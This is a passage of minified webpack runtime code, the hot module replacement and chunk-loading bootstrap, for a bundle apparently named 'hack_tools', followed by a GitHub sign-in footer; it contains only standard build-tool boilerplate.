a.forEach((function(e){if(e.apply){var t=e.apply(c);if(t)for(var l=0;l<t.length;l++)u.push(t[l])}})),Promise.all([r,o]).then((function(){return i?d("fail").then((function(){throw i})):l?v(e).then((function(e){return u.forEach((function(t){e.indexOf(t)<0&&e.push(t)})),e})):d("idle").then((function(){return u}))}))}function h(){if(l)return t||(t=[]),Object.keys(o.hmrI).forEach((function(e){l.forEach((function(l){o.hmrI[e](l,t)}))})),l=void 0,!0}o.hmrD=a,o.i.push((function(s){var v,h,_,g,y=s.module,E=function(t,l){var a=n[l];if(!a)return t;var i=function(i){if(a.hot.active){if(n[i]){var o=n[i].parents;-1===o.indexOf(l)&&o.push(l)}else r=[l],e=i;-1===a.children.indexOf(i)&&a.children.push(i)}else console.warn("[HMR] unexpected require("+i+") from disposed module "+l),r=[];return t(i)},o=function(e){return{configurable:!0,enumerable:!0,get:function(){return t[e]},set:function(l){t[e]=l}}};for(var s in t)Object.prototype.hasOwnProperty.call(t,s)&&"e"!==s&&Object.defineProperty(i,s,o(s));return i.e=function(e){return function(e){switch(c){case"ready":d("prepare");case"prepare":return u++,e.then(p,p),e;default:return e}}(t.e(e))},i}(s.require,s.id);y.hot=(v=s.id,h=y,g={_acceptedDependencies:{},_acceptedErrorHandlers:{},_declinedDependencies:{},_selfAccepted:!1,_selfDeclined:!1,_selfInvalidated:!1,_disposeHandlers:[],_main:_=e!==v,_requireSelf:function(){r=h.parents.slice(),e=_?void 0:v,o(v)},active:!0,accept:function(e,t,l){if(void 0===e)g._selfAccepted=!0;else if("function"==typeof e)g._selfAccepted=e;else if("object"==typeof e&&null!==e)for(var a=0;a<e.length;a++)g._acceptedDependencies[e[a]]=t||function(){},g._acceptedErrorHandlers[e[a]]=l;else g._acceptedDependencies[e]=t||function(){},g._acceptedErrorHandlers[e]=l},decline:function(e){if(void 0===e)g._selfDeclined=!0;else if("object"==typeof e&&null!==e)for(var t=0;t<e.length;t++)g._declinedDependencies[e[t]]=!0;else g._declinedDependencies[e]=!0},dispose:function(e){g._disposeHandlers.push(e)},addDisposeHandler:function(e){g._disposeHandlers.push(e)},removeDisposeHandler:function(e){var t=g._disposeHandlers.indexOf(e);t>=0&&g._disposeHandlers.splice(t,1)},invalidate:function(){switch(this._selfInvalidated=!0,c){case"idle":t=[],Object.keys(o.hmrI).forEach((function(e){o.hmrI[e](v,t)})),d("ready");break;case"ready":Object.keys(o.hmrI).forEach((function(e){o.hmrI[e](v,t)}));break;case"prepare":case"check":case"dispose":case"apply":(l=l||[]).push(v)}},check:m,apply:f,status:function(e){if(!e)return c;i.push(e)},addStatusHandler:function(e){i.push(e)},removeStatusHandler:function(e){var t=i.indexOf(e);t>=0&&i.splice(t,1)},data:a[v]},e=void 0,g),y.parents=r,y.children=[],r=[],s.require=E})),o.hmrC={},o.hmrI={}}(),function(){var e;o.g.importScripts&&(e=o.g.location+"");var t=o.g.document;if(!e&&t&&(t.currentScript&&(e=t.currentScript.src),!e)){var l=t.getElementsByTagName("script");l.length&&(e=l[l.length-1].src)}if(!e)throw new Error("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.*$/,"").replace(/\/[^\/]+$/,"/"),o.p=e}(),function(){var e,t,l,a,n,r=o.hmrS_jsonp=o.hmrS_jsonp||{143:0},i={};function c(t,l){return e=l,new Promise((function(e,l){i[t]=e;var a=o.p+o.hu(t),n=new Error;o.l(a,(function(e){if(i[t]){i[t]=void 0;var a=e&&("load"===e.type?"missing":e.type),r=e&&e.target&&e.target.src;n.message="Loading hot update chunk "+t+" failed.\n("+a+": "+r+")",n.name="ChunkLoadError",n.type=a,n.request=r,l(n)}}))}))}function u(e){function i(e){for(var t=[e],l={},a=t.map((function(e){return{chain:[e],id:e}}));a.length>0;){var n=a.pop(),r=n.id,i=n.chain,u=o.c[r];if(u&&(!u.hot._selfAccepted||u.hot._selfInvalidated)){if(u.hot._selfDeclined)return{type:"self-declined",chain:i,moduleId:r};if(u.hot._main)return{type:"unaccepted",chain:i,moduleId:r};for(var s=0;s<u.parents.length;s++){var d=u.parents[s],p=o.c[d];if(p){if(p.hot._declinedDependencies[r])return{type:"declined",chain:i.concat([d]),moduleId:r,parentId:d};-1===t.indexOf(d)&&(p.hot._acceptedDependencies[r]?(l[d]||(l[d]=[]),c(l[d],[r])):(delete l[d],t.push(d),a.push({chain:i.concat([d]),id:d})))}}}}return{type:"accepted",moduleId:e,outdatedModules:t,outdatedDependencies:l}}function c(e,t){for(var l=0;l<t.length;l++){var a=t[l];-1===e.indexOf(a)&&e.push(a)}}o.f&&delete o.f.jsonpHmr,t=void 0;var u={},s=[],d={},p=function(e){console.warn("[HMR] unexpected require("+e.id+") to disposed module")};for(var m in l)if(o.o(l,m)){var f,v=l[m],h=!1,_=!1,g=!1,y="";switch((f=v?i(m):{type:"disposed",moduleId:m}).chain&&(y="\nUpdate propagation: "+f.chain.join(" -> ")),f.type){case"self-declined":e.onDeclined&&e.onDeclined(f),e.ignoreDeclined||(h=new Error("Aborted because of self decline: "+f.moduleId+y));break;case"declined":e.onDeclined&&e.onDeclined(f),e.ignoreDeclined||(h=new Error("Aborted because of declined dependency: "+f.moduleId+" in "+f.parentId+y));break;case"unaccepted":e.onUnaccepted&&e.onUnaccepted(f),e.ignoreUnaccepted||(h=new Error("Aborted because "+m+" is not accepted"+y));break;case"accepted":e.onAccepted&&e.onAccepted(f),_=!0;break;case"disposed":e.onDisposed&&e.onDisposed(f),g=!0;break;default:throw new Error("Unexception type "+f.type)}if(h)return{error:h};if(_)for(m in d[m]=v,c(s,f.outdatedModules),f.outdatedDependencies)o.o(f.outdatedDependencies,m)&&(u[m]||(u[m]=[]),c(u[m],f.outdatedDependencies[m]));g&&(c(s,[f.moduleId]),d[m]=p)}l=void 0;for(var E,b=[],w=0;w<s.length;w++){var x=s[w],k=o.c[x];k&&(k.hot._selfAccepted||k.hot._main)&&d[x]!==p&&!k.hot._selfInvalidated&&b.push({module:x,require:k.hot._requireSelf,errorHandler:k.hot._selfAccepted})}return{dispose:function(){var e;a.forEach((function(e){delete r[e]})),a=void 0;for(var t,l=s.slice();l.length>0;){var n=l.pop(),i=o.c[n];if(i){var c={},d=i.hot._disposeHandlers;for(w=0;w<d.length;w++)d[w].call(null,c);for(o.hmrD[n]=c,i.hot.active=!1,delete o.c[n],delete u[n],w=0;w<i.children.length;w++){var p=o.c[i.children[w]];p&&(e=p.parents.indexOf(n))>=0&&p.parents.splice(e,1)}}}for(var m in u)if(o.o(u,m)&&(i=o.c[m]))for(E=u[m],w=0;w<E.length;w++)t=E[w],(e=i.children.indexOf(t))>=0&&i.children.splice(e,1)},apply:function(t){for(var l in d)o.o(d,l)&&(o.m[l]=d[l]);for(var a=0;a<n.length;a++)n[a](o);for(var r in u)if(o.o(u,r)){var i=o.c[r];if(i){E=u[r];for(var c=[],p=[],m=[],f=0;f<E.length;f++){var v=E[f],h=i.hot._acceptedDependencies[v],_=i.hot._acceptedErrorHandlers[v];if(h){if(-1!==c.indexOf(h))continue;c.push(h),p.push(_),m.push(v)}}for(var g=0;g<c.length;g++)try{c[g].call(null,E)}catch(l){if("function"==typeof p[g])try{p[g](l,{moduleId:r,dependencyId:m[g]})}catch(a){e.onErrored&&e.onErrored({type:"accept-error-handler-errored",moduleId:r,dependencyId:m[g],error:a,originalError:l}),e.ignoreErrored||(t(a),t(l))}else e.onErrored&&e.onErrored({type:"accept-errored",moduleId:r,dependencyId:m[g],error:l}),e.ignoreErrored||t(l)}}}for(var y=0;y<b.length;y++){var w=b[y],x=w.module;try{w.require(x)}catch(l){if("function"==typeof w.errorHandler)try{w.errorHandler(l,{moduleId:x,module:o.c[x]})}catch(a){e.onErrored&&e.onErrored({type:"self-accept-error-handler-errored",moduleId:x,error:a,originalError:l}),e.ignoreErrored||(t(a),t(l))}else e.onErrored&&e.onErrored({type:"self-accept-errored",moduleId:x,error:l}),e.ignoreErrored||t(l)}}return s}}}self.webpackHotUpdatehack_tools=function(t,a,r){for(var c in a)o.o(a,c)&&(l[c]=a[c],e&&e.push(c));r&&n.push(r),i[t]&&(i[t](),i[t]=void 0)},o.hmrI.jsonp=function(e,t){l||(l={},n=[],a=[],t.push(u)),o.o(l,e)||(l[e]=o.m[e])},o.hmrC.jsonp=function(e,i,s,d,p,m){p.push(u),t={},a=i,l=s.reduce((function(e,t){return e[t]=!1,e}),{}),n=[],e.forEach((function(e){o.o(r,e)&&void 0!==r[e]?(d.push(c(e,m)),t[e]=!0):t[e]=!1})),o.f&&(o.f.jsonpHmr=function(e,l){t&&o.o(t,e)&&!t[e]&&(l.push(c(e)),t[e]=!0)})},o.hmrM=function(){if("undefined"==typeof fetch)throw new Error("No browser support: need fetch API");return fetch(o.p+o.hmrF()).then((function(e){if(404!==e.status){if(!e.ok)throw new Error("Failed to fetch update manifest "+e.statusText);return e.json()}}))},o.O.j=function(e){return 0===r[e]};var s=function(e,t){var l,a,n=t[0],i=t[1],c=t[2],u=0;if(n.some((function(e){return 0!==r[e]}))){for(l in i)o.o(i,l)&&(o.m[l]=i[l]);if(c)var s=c(o)}for(e&&e(t);u<n.length;u++)a=n[u],o.o(r,a)&&r[a]&&r[a][0](),r[a]=0;return o.O(s)},d=self.webpackChunkhack_tools=self.webpackChunkhack_tools||[];d.forEach(s.bind(null,0)),d.push=s.bind(null,d.push.bind(d))}(),o.nc=void 0;var c=o.O(void 0,[252,722,48,376,626,804,660,758,354,611,701,671,909,319,294],(function(){return o(97752)}));c=o.O(c)}();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment